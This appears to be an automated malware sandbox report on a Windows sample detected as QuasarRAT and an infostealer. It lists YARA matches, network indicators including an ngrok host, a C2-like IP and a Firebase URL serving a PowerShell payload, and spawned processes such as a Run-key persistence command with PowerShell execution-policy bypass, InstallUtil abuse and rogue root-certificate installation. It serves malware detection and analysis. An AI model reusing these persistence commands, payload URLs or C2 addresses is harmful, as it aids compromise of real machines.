Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp

String found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.locallisten.onionip+netsocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondsecretuint16uint32uint64structchan<-<-chan Valuehangupkilledexec: %s[%dm%s[%smGolang115_PQ120_PQSafari15.6.1%w: %scurvesspdy/3spdy/2 bytesServerpsk_kex25519GC256AGC256BGC256CGC256DGC512AGC512BGC512CpromptsurveyfrenchSTREETcmd/goavx512rdrandrdseedno '/'headerAnswerLengthWeightTargetGetAcesendtoprintf'"&<>\u%04Xyellowblue+hcyan+hao1990aranesasanteauvernbcizblcisaupcreissdajnkoekavskfonipafonupagascongritalheplocndyukanicardpamakapinyinscousesimpletaraskucrcorulsterunifondefinewarningtls3desderivedInitialnumber booleanbdoUxXvintegercomplexfloat32float64readdirwriteatconsolepav.exeAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUpgradeTrailerHEADERSCreatedIM UsedRefererreferer flags= len=%d (conn) %v=%v,expiresrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCONNECTEd25519scheme FirefoxMeshIosnotepad#%d: %sSHA-224SHA-256SHA-384SHA-512avx512f19531259765625MD5-RSAserial:forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost

Yara detected Generic Downloader

Source: Yara match

File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49709 -> 18.231.236.52:20545

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipwho.is

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 1.tcp.sa.ngrok.io
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://192.95.0.175:3003/loginhttp:
Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/search-ac67b.appspot.com/o/mister.ps1?alt=media&token=e6
Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UI
Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://groups.flytap.comtls:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443

Source: unknown

HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.9:49711 version: TLS 1.2

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_013EF03C	8_2_013EF03C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0786A620	8_2_0786A620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0786CAC0	8_2_0786CAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_07866D88	8_2_07866D88

Source: full.exe

Static PE information: Number of sections : 15 > 10

Source: C:\Users\user\Desktop\full.exe

Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f

Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: full.exe	Static PE information: Section: /19 ZLIB complexity 1.0002911768922018
Source: full.exe	Static PE information: Section: /32 ZLIB complexity 0.9949742168114144
Source: full.exe	Static PE information: Section: /65 ZLIB complexity 0.9996467816026228
Source: full.exe	Static PE information: Section: /78 ZLIB complexity 0.9941019666554206

Source: classification engine

Classification label: mal100.troj.evad.winEXE@20/11@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\a888ff96-3c09-47a6-9d99-754a5cdfdb56

Source: C:\Users\user\Desktop\full.exe

File created: C:\Users\user\AppData\Local\Temp\Adobe.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "

Source: full.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\full.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\full.exe "C:\Users\user\Desktop\full.exe"
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost	Jump to behavior

Source: C:\Users\user\Desktop\full.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: full.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: full.exe

Static file information: File size 17277440 > 1048576

Source: full.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x564600
Source: full.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x52d400
Source: full.exe	Static PE information: Raw size of /65 is bigger than: 0x100000 < 0x199e00
Source: full.exe	Static PE information: Raw size of /78 is bigger than: 0x100000 < 0x115e00

Source: full.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: full.exe	Static PE information: section name: .xdata
Source: full.exe	Static PE information: section name: /4
Source: full.exe	Static PE information: section name: /19
Source: full.exe	Static PE information: section name: /32
Source: full.exe	Static PE information: section name: /46
Source: full.exe	Static PE information: section name: /65
Source: full.exe	Static PE information: section name: /78
Source: full.exe	Static PE information: section name: /90
Source: full.exe	Static PE information: section name: .symtab

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 8_2_013E7279 push ecx; iretd

8_2_013E7297

Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs

High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'pe', 'QpoHmUNRHcmvRUnpNC', 'E3bT3Xq19PAL2CMkGh', 'wM3amNHVylONQ8eC9s', 'mVri2PMNOEg3kLlTUX', 'pLGfHtPKnvo6kRfT1e', 'W7bQcKe3LhGBgX5N7J'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\Desktop\full.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULL powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1"

Jump to behavior

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULL			Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULL			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\full.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\full.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\full.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
